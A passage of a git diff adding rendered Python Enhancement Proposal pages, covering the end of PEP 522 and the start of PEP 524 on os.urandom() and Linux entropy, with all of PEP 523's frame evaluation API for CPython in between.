It’s also done due to the BDFL having a higher tolerance for APIs that might +block unexpectedly than he does for APIs that might throw an unexpected +exception [11].

+
+
+

Raising BlockingIOError in os.urandom() on Linux

+

For several years now, the security community’s guidance has been to use +os.urandom() (or the random.SystemRandom() wrapper) when implementing +security sensitive operations in Python.

+

To help improve API discoverability and make it clearer that secrecy and +simulation are not the same problem (even though they both involve +random numbers), PEP 506 collected several of the one line recipes based +on the lower level os.urandom() API into a new secrets module.

+

However, this guidance has also come with a longstanding caveat: developers +writing security sensitive software at least for Linux, and potentially for +some other *BSD systems, may need to wait until the operating system’s +random number generator is ready before relying on it for security sensitive +operations. This generally only occurs if os.urandom() is read very +early in the system initialization process, or on systems with few sources of +available entropy (e.g. some kinds of virtualized or embedded systems), but +unfortunately the exact conditions that trigger this are difficult to predict, +and when it occurs then there is no direct way for userspace to tell it has +happened without querying operating system specific interfaces.

+

On *BSD systems (if the particular *BSD variant allows the problem to occur +at all) and potentially also Solaris and Illumos, encountering this situation +means os.urandom() will either block waiting for the system random number +generator to be ready (the associated symptom would be for the affected script +to pause unexpectedly on the first call to os.urandom()) or else will +behave the same way as it does on Linux.

+

On Linux, in Python versions up to and including Python 3.4, and in +Python 3.5 maintenance versions following Python 3.5.2, there’s no clear +indicator to developers that their software may not be working as expected +when run early in the Linux boot process, or on hardware without good +sources of entropy to seed the operating system’s random number generator: due +to the behaviour of the underlying /dev/urandom device, os.urandom() +on Linux returns a result either way, and it takes extensive statistical +analysis to show that a security vulnerability exists.

+

By contrast, if BlockingIOError is raised in those situations, then +developers using Python 3.6+ can easily choose their desired behaviour:

+
1. Wait for the system RNG at or before application startup (security sensitive)
2. Switch to using the random module (non-security sensitive); both options are sketched below
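A minimal sketch of both options (function names are illustrative, assuming this PEP's proposed os.urandom() and secrets behaviour):

import os

def security_sensitive_token(nbytes=32):
    try:
        return os.urandom(nbytes)
    except BlockingIOError:
        import secrets
        secrets.wait_for_system_rng()  # option 1: wait for the system RNG
        return os.urandom(nbytes)

def simulation_seed(nbytes=32):
    try:
        return os.urandom(nbytes)
    except BlockingIOError:
        import random  # option 2: non-security sensitive fallback
        return random.getrandbits(nbytes * 8).to_bytes(nbytes, "little")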
+
+

Making secrets.wait_for_system_rng() public

+

Earlier versions of this PEP proposed a number of recipes for wrapping +os.urandom() to make it suitable for use in security sensitive use cases.

+

Discussion of the proposal on the security-sig mailing list prompted the +realization [9] that the core assumption driving the API design in this PEP +was that choosing between letting the exception cause the application to fail, +blocking waiting for the system RNG to be ready and switching to using the +random module instead of os.urandom is an application and use-case +specific decision that should take into account application and use-case +specific details.

+

There is no way for the interpreter runtime or support libraries to determine whether a particular use case is security sensitive or not, and while it's straightforward for an application developer to decide how to handle an exception thrown by a particular API, they can't readily work around an API blocking when they expected it to be non-blocking.

+

Accordingly, the PEP was updated to add secrets.wait_for_system_rng() as +an API for applications, scripts and frameworks to use to indicate that they +wanted to ensure the system RNG was available before continuing, while library +developers could continue to call os.urandom() without worrying that it +might unexpectedly start blocking waiting for the system RNG to be available.

+
+
+
+

Backwards Compatibility Impact Assessment

+

Similar to PEP 476, this is a proposal to turn a previously silent security +failure into a noisy exception that requires the application developer to +make an explicit decision regarding the behaviour they desire.

+

As no changes are proposed for operating systems that don’t provide the +getrandom() syscall, os.urandom() retains its existing behaviour as +a nominally blocking API that is non-blocking in practice due to the difficulty +of scheduling Python code to run before the operating system random number +generator is ready. We believe it may be possible to encounter problems akin to +those described in this PEP on at least some *BSD variants, but nobody has +explicitly demonstrated that. On Mac OS X and Windows, it appears to be +straight up impossible to even try to run a Python interpreter that early in +the boot process.

+

On Linux and other platforms with similar /dev/urandom behaviour, +os.urandom() retains its status as a guaranteed non-blocking API. +However, the means of achieving that status changes in the specific case of +the operating system random number generator not being ready for use in security +sensitive operations: historically it would return potentially predictable +random data, with this PEP it would change to raise BlockingIOError.

+

Developers of affected applications would then be required to make one of the +following changes to gain forward compatibility with Python 3.6, based on the +kind of application they’re developing.

+
+

Unaffected Applications

+

The following kinds of applications would be entirely unaffected by the change, +regardless of whether or not they perform security sensitive operations:

+
• applications that don't support Linux
• applications that are only run on desktops or conventional servers
• applications that are only run after the system RNG is ready (including those where an application framework calls secrets.wait_for_system_rng() on their behalf)
+

Applications in this category simply won’t encounter the new exception, so it +will be reasonable for developers to wait and see if they receive +Python 3.6 compatibility bugs related to the new runtime behaviour, rather than +attempting to pre-emptively determine whether or not they’re affected.

+
+
+

Affected security sensitive applications

+

Security sensitive applications would need to either change their system +configuration so the application is only started after the operating system +random number generator is ready for security sensitive operations, change the +application startup code to invoke secrets.wait_for_system_rng(), or +else switch to using the new secrets.token_bytes() API.

+

As an example for components started via a systemd unit file, the following +snippet would delay activation until the system RNG was ready:

+
+
ExecStartPre=python3 -c "import secrets; secrets.wait_for_system_rng()"
+

Alternatively, the following snippet will use secrets.token_bytes() if +available, and fall back to os.urandom() otherwise:

+
+
+
try:
+    from secrets import token_bytes as _get_random_bytes
+except ImportError:
+    from os import urandom as _get_random_bytes
+
+
+
+
+

Affected non-security sensitive applications

+

Non-security sensitive applications should be updated to use the random +module rather than os.urandom:

+
def pseudorandom_bytes(num_bytes):
+    return random.getrandbits(num_bytes*8).to_bytes(num_bytes, "little")
+
+
+

Depending on the details of the application, the random module may offer +other APIs that can be used directly, rather than needing to emulate the +raw byte sequence produced by the os.urandom() API.

+
+
+
+

Additional Background

+
+

Why propose this now?

+

The main reason is because the Python 3.5.0 release switched to using the new +Linux getrandom() syscall when available in order to avoid consuming a +file descriptor [1], and this had the side effect of making the following +operations block waiting for the system random number generator to be ready:

+
• os.urandom (and APIs that depend on it)
• importing the random module
• initializing the randomized hash algorithm used by some builtin types
+

While the first of those behaviours is arguably desirable (and consistent with +the existing behaviour of os.urandom on other operating systems), the +latter two behaviours are unnecessary and undesirable, and the last one is now +known to cause a system level deadlock when attempting to run Python scripts +during the Linux init process with Python 3.5.0 or 3.5.1 [2], while the second +one can cause problems when using virtual machines without robust entropy +sources configured [3].

+

Since decoupling these behaviours in CPython will involve a number of +implementation changes more appropriate for a feature release than a maintenance +release, the relatively simple resolution applied in Python 3.5.2 was to revert +all three of them to a behaviour similar to that of previous Python versions: +if the new Linux syscall indicates it will block, then Python 3.5.2 will +implicitly fall back on reading /dev/urandom directly [4].

+

However, this bug report also resulted in a range of proposals to add new +APIs like os.getrandom() [5], os.urandom_block() [6], +os.pseudorandom() and os.cryptorandom() [7], or adding new optional +parameters to os.urandom() itself [8], and then attempting to educate +users on when they should call those APIs instead of just using a plain +os.urandom() call.

+

These proposals arguably represent overreactions, as the question of reliably +obtaining random numbers suitable for security sensitive work on Linux is a +relatively obscure problem of interest mainly to operating system developers +and embedded systems programmers, that may not justify expanding the +Python standard library’s cross-platform APIs with new Linux-specific concerns. +This is especially so with the secrets module already being added as the +“use this and don’t worry about the low level details” option for developers +writing security sensitive software that for some reason can’t rely on even +higher level domain specific APIs (like web frameworks) and also don’t need to +worry about Python versions prior to Python 3.6.

+

That said, it’s also the case that low cost ARM devices are becoming +increasingly prevalent, with a lot of them running Linux, and a lot of folks +writing Python applications that run on those devices. That creates an +opportunity to take an obscure security problem that currently requires a lot +of knowledge about Linux boot processes and provably unpredictable random +number generation to diagnose and resolve, and instead turn it into a +relatively mundane and easy-to-find-in-an-internet-search runtime exception.

+
+
+

The cross-platform behaviour of os.urandom()

+

On operating systems other than Linux and NetBSD, os.urandom() may already +block waiting for the operating system’s random number generator to be ready. +This will happen at most once in the lifetime of the process, and the call is +subsequently guaranteed to be non-blocking.

+

Linux and NetBSD are outliers in that, even when the operating system’s random +number generator doesn’t consider itself ready for use in security sensitive +operations, reading from the /dev/urandom device will return random values +based on the entropy it has available.

+

This behaviour is potentially problematic, so Linux 3.17 added a new +getrandom() syscall that (amongst other benefits) allows callers to +either block waiting for the random number generator to be ready, or +else request an error return if the random number generator is not ready. +Notably, the new API does not support the old behaviour of returning +data that is not suitable for security sensitive use cases.

+

Python versions up to and including Python 3.4 access the Linux /dev/urandom device directly.

+

Python 3.5.0 and 3.5.1 (when built on a system that offered the new syscall) called getrandom() in blocking mode in order to avoid the use of a file descriptor to access /dev/urandom. While there were no specific problems reported due to os.urandom() blocking in user code, there were problems due to CPython implicitly invoking the blocking behaviour during interpreter startup and when importing the random module.

+

Rather than trying to decouple SipHash initialization from the +os.urandom() implementation, Python 3.5.2 switched to calling +getrandom() in non-blocking mode, and falling back to reading from +/dev/urandom if the syscall indicates it will block.

+

As a result of the above, os.urandom() in all Python versions up to and including Python 3.5 propagates the behaviour of the underlying /dev/urandom device to Python code.

+
+
+

Problems with the behaviour of /dev/urandom on Linux

+

The Python os module has largely co-evolved with Linux APIs, so having +os module functions closely follow the behaviour of their Linux operating +system level counterparts when running on Linux is typically considered to be +a desirable feature.

+

However, /dev/urandom represents a case where the current behaviour is +acknowledged to be problematic, but fixing it unilaterally at the kernel level +has been shown to prevent some Linux distributions from booting (at least in +part due to components like Python currently using it for +non-security-sensitive purposes early in the system initialization process).

+

As an analogy, consider the following two functions:

+
def generate_example_password():
+    """Generates passwords solely for use in code examples"""
+    return generate_unpredictable_password()
+
+def generate_actual_password():
+    """Generates actual passwords for use in real applications"""
+    return generate_unpredictable_password()
+
+
+

If you think of an operating system’s random number generator as a method for +generating unpredictable, secret passwords, then you can think of Linux’s +/dev/urandom as being implemented like:

+
# Oversimplified artist's conception of the kernel code
+# implementing /dev/urandom
+def generate_unpredictable_password():
+    if system_rng_is_ready:
+        return use_system_rng_to_generate_password()
+    else:
+        # we can't make an unpredictable password; silently return a
+        # potentially predictable one instead:
+        return "p4ssw0rd"
+
+
+

In this scenario, the author of generate_example_password is fine - even if +"p4ssw0rd" shows up a bit more often than they expect, it’s only used in +examples anyway. However, the author of generate_actual_password has a +problem - how do they prove that their calls to +generate_unpredictable_password never follow the path that returns a +predictable answer?

+

In real life it’s slightly more complicated than this, because there +might be some level of system entropy available – so the fallback might +be more like return random.choice(["p4ssword", "passw0rd", +"p4ssw0rd"]) or something even more variable and hence only statistically +predictable with better odds than the author of generate_actual_password +was expecting. This doesn’t really make things more provably secure, though; +mostly it just means that if you try to catch the problem in the obvious way – +if returned_password == "p4ssw0rd": raise UhOh – then it doesn’t work, +because returned_password might instead be p4ssword or even +pa55word, or just an arbitrary 64 bit sequence selected from fewer than +2**64 possibilities. So this rough sketch does give the right general idea of +the consequences of the “more predictable than expected” fallback behaviour, +even though it’s thoroughly unfair to the Linux kernel team’s efforts to +mitigate the practical consequences of this problem without resorting to +breaking backwards compatibility.

+

This design is generally agreed to be a bad idea. As far as we can +tell, there are no use cases whatsoever in which this is the behavior +you actually want. It has led to the use of insecure ssh keys on +real systems, and many *nix-like systems (including at least Mac OS +X, OpenBSD, and FreeBSD) have modified their /dev/urandom +implementations so that they never return predictable outputs, either +by making reads block in this case, or by simply refusing to run any +userspace programs until the system RNG has been +initialized. Unfortunately, Linux has so far been unable to follow +suit, because it’s been empirically determined that enabling the +blocking behavior causes some currently extant distributions to +fail to boot.

+

Instead, the new getrandom() syscall was introduced, making +it possible for userspace applications to access the system random number +generator safely, without introducing hard to debug deadlock problems into +the system initialization processes of existing Linux distros.

+
+
+

Consequences of getrandom() availability for Python

+

Prior to the introduction of the getrandom() syscall, it simply wasn’t +feasible to access the Linux system random number generator in a provably +safe way, so we were forced to settle for reading from /dev/urandom as the +best available option. However, with getrandom() insisting on raising an +error or blocking rather than returning predictable data, as well as having +other advantages, it is now the recommended method for accessing the kernel +RNG on Linux, with reading /dev/urandom directly relegated to “legacy” +status. This moves Linux into the same category as other operating systems +like Windows, which doesn’t provide a /dev/urandom device at all: the +best available option for implementing os.urandom() is no longer simply +reading bytes from the /dev/urandom device.

+

This means that what used to be somebody else’s problem (the Linux kernel +development team’s) is now Python’s problem – given a way to detect that the +system RNG is not initialized, we have to choose how to handle this +situation whenever we try to use the system RNG.

+

It could simply block, as was somewhat inadvertently implemented in 3.5.0, +and as is proposed in Victor Stinner’s competing PEP:

+
# artist's impression of the CPython 3.5.0-3.5.1 behavior
+def generate_unpredictable_bytes_or_block(num_bytes):
+    while not system_rng_is_ready:
+        wait
+    return unpredictable_bytes(num_bytes)
+
+
+

Or it could raise an error, as this PEP proposes (in some cases):

+
# artist's impression of the behavior proposed in this PEP
+def generate_unpredictable_bytes_or_raise(num_bytes):
+    if system_rng_is_ready:
+        return unpredictable_bytes(num_bytes)
+    else:
+        raise BlockingIOError
+
+
+

Or it could explicitly emulate the /dev/urandom fallback behavior, +as was implemented in 3.5.2rc1 and is expected to remain for the rest +of the 3.5.x cycle:

+
# artist's impression of the CPython 3.5.2rc1+ behavior
+def generate_unpredictable_bytes_or_maybe_not(num_bytes):
+    if system_rng_is_ready:
+        return unpredictable_bytes(num_bytes)
+    else:
+        return (b"p4ssw0rd" * (num_bytes // 8 + 1))[:num_bytes]
+
+
+

(And the same caveats apply to this sketch as applied to the +generate_unpredictable_password sketch of /dev/urandom above.)

+

There are five places where CPython and the standard library attempt to use the +operating system’s random number generator, and thus five places where this +decision has to be made:

+
• initializing the SipHash used to protect str.__hash__ and friends against DoS attacks (called unconditionally at startup)
• initializing the random module (called when random is imported)
• servicing user calls to the os.urandom public API
• the higher level random.SystemRandom public API
• the new secrets module public API added by PEP 506
+

Previously, these five places all used the same underlying code, and +thus made this decision in the same way.

+

This whole problem was first noticed because 3.5.0 switched that +underlying code to the generate_unpredictable_bytes_or_block behavior, +and it turns out that there are some rare cases where Linux boot +scripts attempted to run a Python program as part of system initialization, the +Python startup sequence blocked while trying to initialize SipHash, +and then this triggered a deadlock because the system stopped doing +anything – including gathering new entropy – until the Python script +was forcibly terminated by an external timer. This is particularly unfortunate +since the scripts in question never processed untrusted input, so there was no +need for SipHash to be initialized with provably unpredictable random data in +the first place. This motivated the change in 3.5.2rc1 to emulate the old +/dev/urandom behavior in all cases (by calling getrandom() in +non-blocking mode, and then falling back to reading /dev/urandom +if the syscall indicates that the /dev/urandom pool is not yet +fully initialized.)

+

We don’t know whether such problems may also exist in the Fedora/RHEL/CentOS +ecosystem, as the build systems for those distributions use chroots on servers +running an older operating system kernel that doesn’t offer the getrandom() +syscall, which means CPython’s current build configuration compiles out the +runtime check for that syscall [10].

+

A similar problem was found due to the random module calling +os.urandom as a side-effect of import in order to seed the default +global random.Random() instance.

+

We have not received any specific complaints regarding direct calls to +os.urandom() or random.SystemRandom() blocking with 3.5.0 or 3.5.1 - +only problem reports due to the implicit blocking on interpreter startup and +as a side-effect of importing the random module.

+

Independently of this PEP, the first two cases have already been updated to +never block, regardless of the behaviour of os.urandom().

+

Where PEP 524 proposes to make all 3 of the latter cases block implicitly, this PEP proposes that approach only for the last case (the secrets module), with os.urandom() and random.SystemRandom() instead raising an exception when they detect that the underlying operating system call would block.

+
+
+
+

References

+ +

For additional background details beyond those captured in this PEP and Victor’s +competing PEP, also see Victor’s prior collection of relevant information and +links at https://haypo-notes.readthedocs.io/summary_python_random_issue.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0522.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0523/index.html b/pep-0523/index.html new file mode 100644 index 00000000000..100280957ff --- /dev/null +++ b/pep-0523/index.html @@ -0,0 +1,535 @@ + + + + + + + + PEP 523 – Adding a frame evaluation API to CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 523 – Adding a frame evaluation API to CPython

+
+
Author:
+
Brett Cannon <brett at python.org>, +Dino Viehland <dinov at microsoft.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-May-2016
+
Python-Version:
+
3.6
+
Post-History:
+
16-May-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to expand CPython’s C API [2] to allow for +the specification of a per-interpreter function pointer to handle the +evaluation of frames [5]. This proposal also +suggests adding a new field to code objects [3] to store +arbitrary data for use by the frame evaluation function.

+
+
+

Rationale

+

One place where flexibility has been lacking in Python is in the direct +execution of Python code. While CPython’s C API [2] allows for +constructing the data going into a frame object and then evaluating it +via PyEval_EvalFrameEx() [5], control over the +execution of Python code comes down to individual objects instead of a +holistic control of execution at the frame level.

+

While wanting to have influence over frame evaluation may seem a bit +too low-level, it does open the possibility for things such as a +method-level JIT to be introduced into CPython without CPython itself +having to provide one. By allowing external C code to control frame +evaluation, a JIT can participate in the execution of Python code at +the key point where evaluation occurs. This then allows for a JIT to +conditionally recompile Python bytecode to machine code as desired +while still allowing for executing regular CPython bytecode when +running the JIT is not desired. This can be accomplished by allowing +interpreters to specify what function to call to evaluate a frame. And +by placing the API at the frame evaluation level it allows for a +complete view of the execution environment of the code for the JIT.

+

This ability to specify a frame evaluation function also allows for +other use-cases beyond just opening CPython up to a JIT. For instance, +it would not be difficult to implement a tracing or profiling function +at the call level with this API. While CPython does provide the +ability to set a tracing or profiling function at the Python level, +this would be able to match the data collection of the profiler and +quite possibly be faster for tracing by simply skipping per-line +tracing support.

+

It also opens up the possibility of debugging where the frame +evaluation function only performs special debugging work when it +detects it is about to execute a specific code object. In that +instance the bytecode could be theoretically rewritten in-place to +inject a breakpoint function call at the proper point for help in +debugging while not having to do a heavy-handed approach as +required by sys.settrace().
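In the same Python-flavoured pseudocode style used for the Pyjion example later in this PEP, such a hook might look like the following (TARGET_CODE and breakpoint_hook are hypothetical names, not part of the proposal):

def debugging_eval_frame(frame, throw_flag):
    if frame.code is TARGET_CODE:  # hypothetical code object of interest
        breakpoint_hook(frame)     # hypothetical debugging injection
    return _PyEval_EvalFrameDefault(frame, throw_flag)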

+

To help facilitate these use-cases, we are also proposing the addition of a "scratch space" on code objects via a new field. This will allow per-code object data to be stored with the code object itself for easy retrieval by the frame evaluation function as necessary. The field itself will simply be a PyObject * type so that any data stored in the field will participate in normal object memory management.

+
+
+

Proposal

+

All proposed C API changes below will not be part of the stable ABI.

+
+

Expanding PyCodeObject

+

One field is to be added to the PyCodeObject struct +[3]:

+
typedef struct {
+   ...
+   void *co_extra;  /* "Scratch space" for the code object. */
+} PyCodeObject;
+
+
+

The co_extra will be NULL by default and only filled in as +needed. Values stored in the field are expected to not be required +in order for the code object to function, allowing the loss of the +data of the field to be acceptable.

+

A private API has been introduced to work with the field:

+
PyAPI_FUNC(Py_ssize_t) _PyEval_RequestCodeExtraIndex(freefunc);
+PyAPI_FUNC(int) _PyCode_GetExtra(PyObject *code, Py_ssize_t index,
+                                 void **extra);
+PyAPI_FUNC(int) _PyCode_SetExtra(PyObject *code, Py_ssize_t index,
+                                 void *extra);
+
+
+

Users of the field are expected to call _PyEval_RequestCodeExtraIndex() to receive (what should be considered) an opaque index value for adding data into co_extra. With that index, users can set data using _PyCode_SetExtra() and later retrieve the data with _PyCode_GetExtra(). The API is purposefully listed as private to communicate the fact that there are no semantic guarantees of the API between Python releases.

+

Using a list or tuple was considered but found to be less performant, and with a key use-case being JIT usage the performance consideration won out in favor of a custom struct instead of a Python object.

+

A dict was also considered, but once again performance was more +important. While a dict will have constant overhead in looking up +data, the overhead for the common case of a single object being stored +in the data structure leads to a tuple having better performance +characteristics (i.e. iterating a tuple of length 1 is faster than +the overhead of hashing and looking up an object in a dict).
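A rough, illustrative micro-benchmark (not from the PEP) of the comparison being made, iterating a length-1 tuple versus hashing and looking up a key in a dict:

import timeit

setup = "t = (object(),); d = {'key': object()}"
tuple_time = timeit.timeit("for x in t: pass", setup=setup)
dict_time = timeit.timeit("d['key']", setup=setup)
print(f"1-tuple iteration: {tuple_time:.3f}s   dict lookup: {dict_time:.3f}s")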

+
+
+

Expanding PyInterpreterState

+

The entrypoint for the frame evaluation function is per-interpreter:

+
// Same type signature as PyEval_EvalFrameEx().
+typedef PyObject* (*_PyFrameEvalFunction)(PyFrameObject*, int);
+
+typedef struct {
+    ...
+    _PyFrameEvalFunction eval_frame;
+} PyInterpreterState;
+
+
+

By default, the eval_frame field will be initialized to a function +pointer that represents what PyEval_EvalFrameEx() currently is +(called _PyEval_EvalFrameDefault(), discussed later in this PEP). +Third-party code may then set their own frame evaluation function +instead to control the execution of Python code. A pointer comparison +can be used to detect if the field is set to +_PyEval_EvalFrameDefault() and thus has not been mutated yet.

+
+
+

Changes to Python/ceval.c

+

PyEval_EvalFrameEx() [5] as it currently stands +will be renamed to _PyEval_EvalFrameDefault(). The new +PyEval_EvalFrameEx() will then become:

+
PyObject *
+PyEval_EvalFrameEx(PyFrameObject *frame, int throwflag)
+{
+    PyThreadState *tstate = PyThreadState_GET();
+    return tstate->interp->eval_frame(frame, throwflag);
+}
+
+
+

This allows third-party code to place itself directly in the path of Python code execution while being backwards-compatible with code already using the pre-existing C API.

+
+
+

Updating python-gdb.py

+

The generated python-gdb.py file used for Python support in GDB +makes some hard-coded assumptions about PyEval_EvalFrameEx(), e.g. +the names of local variables. It will need to be updated to work with +the proposed changes.

+
+
+
+

Performance impact

+

As this PEP is proposing an API to add pluggability, performance +impact is considered only in the case where no third-party code has +made any changes.

+

Several runs of pybench [14] consistently showed no performance +cost from the API change alone.

+

A run of the Python benchmark suite [9] showed no +measurable cost in performance.

+

In terms of memory impact, since there are typically not many CPython interpreters executing in a single process, the addition of co_extra to PyCodeObject is the only real concern. According to [8], a run of the Python test suite results in about 72,395 code objects being created. On a 64-bit CPU that would result in 579,160 bytes of extra memory being used if all code objects were alive at once and had nothing set in their co_extra fields.

+
+
+

Example Usage

+
+

A JIT for CPython

+
+

Pyjion

+

The Pyjion project [1] has used this proposed API to implement +a JIT for CPython using the CoreCLR’s JIT [4]. Each code +object has its co_extra field set to a PyjionJittedCode object +which stores four pieces of information:

+
    +
  1. Execution count
  2. A boolean representing whether a previous attempt to JIT failed
  3. A function pointer to a trampoline (which can be type tracing or not)
  4. A void pointer to any JIT-compiled machine code
+

The frame evaluation function has (roughly) the following algorithm:

+
def eval_frame(frame, throw_flag):
+    pyjion_code = frame.code.co_extra
+    if pyjion_code is None:
+        # First time seeing this code object: attach the scratch data.
+        pyjion_code = frame.code.co_extra = PyjionJittedCode()
+    elif not pyjion_code.jit_failed:
+        if pyjion_code.jit_code:
+            # Machine code already exists: run it via the trampoline.
+            return pyjion_code.eval(pyjion_code.jit_code, frame)
+        elif pyjion_code.exec_count > 20_000:
+            # Hot code object: try to JIT-compile it.
+            if jit_compile(frame):
+                return pyjion_code.eval(pyjion_code.jit_code, frame)
+            else:
+                pyjion_code.jit_failed = True
+    pyjion_code.exec_count += 1
+    return _PyEval_EvalFrameDefault(frame, throw_flag)
+
+
+

The key point, though, is that all of this work and logic is separate +from CPython and yet with the proposed API changes it is able to +provide a JIT that is compliant with Python semantics (as of this +writing, performance is almost equivalent to CPython without the new +API). This means there’s nothing technically preventing others from +implementing their own JITs for CPython by utilizing the proposed API.

+
+
+

Other JITs

+

It should be mentioned that the Pyston team was consulted on an earlier version of this PEP that was more JIT-specific, and they were not interested in utilizing the proposed changes: they want control over memory layout and had no interest in directly supporting CPython itself. An informal discussion with a developer on the PyPy team led to a similar comment.

+

Numba [6], on the other hand, suggested that they would be +interested in the proposed change in a post-1.0 future for +themselves [7].

+

The experimental Coconut JIT [13] could have benefitted from +this PEP. In private conversations with Coconut’s creator we were told +that our API was probably superior to the one they developed for +Coconut to add JIT support to CPython.

+
+
+
+

Debugging

+

In conversations with the Python Tools for Visual Studio team (PTVS) [12], they thought they would find these API changes useful for implementing more performant debugging. As mentioned in the Rationale section, this API would allow for switching on debugging functionality only in frames where it is needed. This could allow for either skipping information that sys.settrace() normally provides or even going as far as dynamically rewriting bytecode prior to execution to inject e.g. breakpoints in the bytecode.

+

It also turns out that Google provides a very similar API +internally. It has been used for performant debugging purposes.

+
+
+
+

Implementation

+

A set of patches implementing the proposed API is available through +the Pyjion project [1]. In its current form it has more +changes to CPython than just this proposed API, but that is for ease +of development instead of strict requirements to accomplish its goals.

+
+
+

Open Issues

+
+

Allow eval_frame to be NULL

+

Currently the frame evaluation function is expected to always be set. It could very easily default to NULL instead, which would signal that _PyEval_EvalFrameDefault() is to be used. The current proposal of not special-casing the field seemed the most straightforward, but it does require that the field not accidentally be cleared, else a crash may occur.

+
+
+
+

Rejected Ideas

+
+

A JIT-specific C API

+

Originally this PEP was going to propose a much larger API change +which was more JIT-specific. After soliciting feedback from the Numba +team [6], though, it became clear that the API was unnecessarily +large. The realization was made that all that was truly needed was the +opportunity to provide a trampoline function to handle execution of +Python code that had been JIT-compiled and a way to attach that +compiled machine code along with other critical data to the +corresponding Python code object. Once it was shown that there was no +loss in functionality or in performance while minimizing the API +changes required, the proposal was changed to its current form.

+
+
+

Is co_extra needed?

+

While discussing this PEP at PyCon US 2016, some core developers +expressed their worry of the co_extra field making code objects +mutable. The thinking seemed to be that having a field that was +mutated after the creation of the code object made the object seem +mutable, even though no other aspect of code objects changed.

+

The view of this PEP is that the co_extra field doesn’t change the +fact that code objects are immutable. The field is specified in this +PEP to not contain information required to make the code object +usable, making it more of a caching field. It could be viewed as +similar to the UTF-8 cache that string objects have internally; +strings are still considered immutable even though they have a field +that is conditionally set.

+

Performance measurements were also made where the field was not available for JIT workloads. The loss of the field was deemed too costly to performance when using an unordered map from C++ or Python's dict to associate a code object with JIT-specific data objects.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0523.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0524/index.html b/pep-0524/index.html new file mode 100644 index 00000000000..7fa68837112 --- /dev/null +++ b/pep-0524/index.html @@ -0,0 +1,679 @@ + + + + + + + + PEP 524 – Make os.urandom() blocking on Linux | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 524 – Make os.urandom() blocking on Linux

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jun-2016
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

Modify os.urandom() to block on Linux 3.17 and newer until the OS urandom is initialized, to increase security.

+

Also add a new os.getrandom() function (for Linux and Solaris) so that applications can choose how to handle the case where os.urandom() would block on Linux.

+
+
+

The bug

+
+

Original bug

+

Python 3.5.0 was enhanced to use the new getrandom() syscall +introduced in Linux 3.17 and Solaris 11.3. The problem is that users +started to complain that Python 3.5 blocks at startup on Linux in +virtual machines and embedded devices: see issues #25420 and #26839.

+

On Linux, getrandom(0) blocks until the kernel has initialized urandom with 128 bits of entropy. The issue #25420 describes a Linux build platform blocking at import random. The issue #26839 describes a short Python script used to compute a MD5 hash, systemd-cron, which is called very early in the init process. The system initialization blocks on this script, which in turn blocks on getrandom(0) to initialize Python.

+

The Python initialization requires random bytes to implement a +counter-measure against the hash denial-of-service (hash DoS), see:

+ +

Importing the random module creates an instance of +random.Random: random._inst. On Python 3.5, random.Random +constructor reads 2500 bytes from os.urandom() to seed a Mersenne +Twister RNG (random number generator).

+

Other platforms may be affected by this bug, but in practice, only Linux +systems use Python scripts to initialize the system.

+
+
+

Status in Python 3.5.2

+

Python 3.5.2 behaves like Python 2.7 and Python 3.4. If the system urandom is not initialized, the startup does not block, but os.urandom() can return low-quality entropy (even if it is not easily guessable).

+
+
+
+

Use Cases

+

The following use cases are used to help to choose the right compromise +between security and practicability.

+
+

Use Case 1: init script

+

Use a Python 3 script to initialize the system, like systemd-cron. If the script blocks, the system initialization is stuck too. The issue #26839 is a good example of this use case.

+
+

Use case 1.1: No secret needed

+

If the init script doesn’t have to generate any secure secret, this use +case is already handled correctly in Python 3.5.2: Python startup +doesn’t block on system urandom anymore.

+
+
+

Use case 1.2: Secure secret required

+

If the init script has to generate a secure secret, there is no safe +solution.

+

Falling back to weak entropy is not acceptable, as it would reduce the security of the program.

+

Python cannot itself produce secure entropy; it can only wait until the system urandom is initialized. But in this use case, the whole system initialization is blocked by this script, so the system fails to boot.

+

The real answer is that the system initialization must not be blocked by such a script. It is ok to start the script very early at system initialization, but the script may block for a few seconds until it is able to generate the secret.

+

Reminder: in some cases, the initialization of the system urandom never occurs, and so programs waiting for system urandom block forever.

+
+
+
+

Use Case 2: Web server

+

Run a Python 3 web server serving web pages using HTTP and HTTPS +protocols. The server is started as soon as possible.

+

The first target of the hash DoS attack was web servers: it's important that the hash secret cannot be easily guessed by an attacker.

+

If serving a web page needs a secret to create a cookie, create an +encryption key, …, the secret must be created with good entropy: +again, it must be hard to guess the secret.

+

A web server requires security. If a choice must be made between security and running the server with weak entropy, security is more important. If there is no good entropy, the server must block or fail with an error.

+

The question is whether it makes sense to start a web server on a host before system urandom is initialized.

+

The issues #25420 and #26839 are restricted to the Python startup, not to generating a secret before the system urandom is initialized.

+
+
+
+

Fix system urandom

+
+

Load entropy from disk at boot

+

Collecting entropy can take up to several minutes. To accelerate the system initialization, operating systems store entropy on disk at shutdown, and then reload entropy from disk at boot.

+

If a system collects enough entropy at least once, the system urandom +will be initialized quickly, as soon as the entropy is reloaded from +disk.

+
+
+

Virtual machines

+

Virtual machines don’t have a direct access to the hardware and so have +less sources of entropy than bare metal. A solution is to add a +virtio-rng device to pass entropy +from the host to the virtual machine.

+
+
+

Embedded devices

+

A solution for embedded devices is to plug in a hardware RNG.

+

For example, the Raspberry Pi has a hardware RNG, but it's not used by default. See: Hardware RNG on Raspberry Pi.

+
+
+
+

Denial-of-service when reading random

+
+

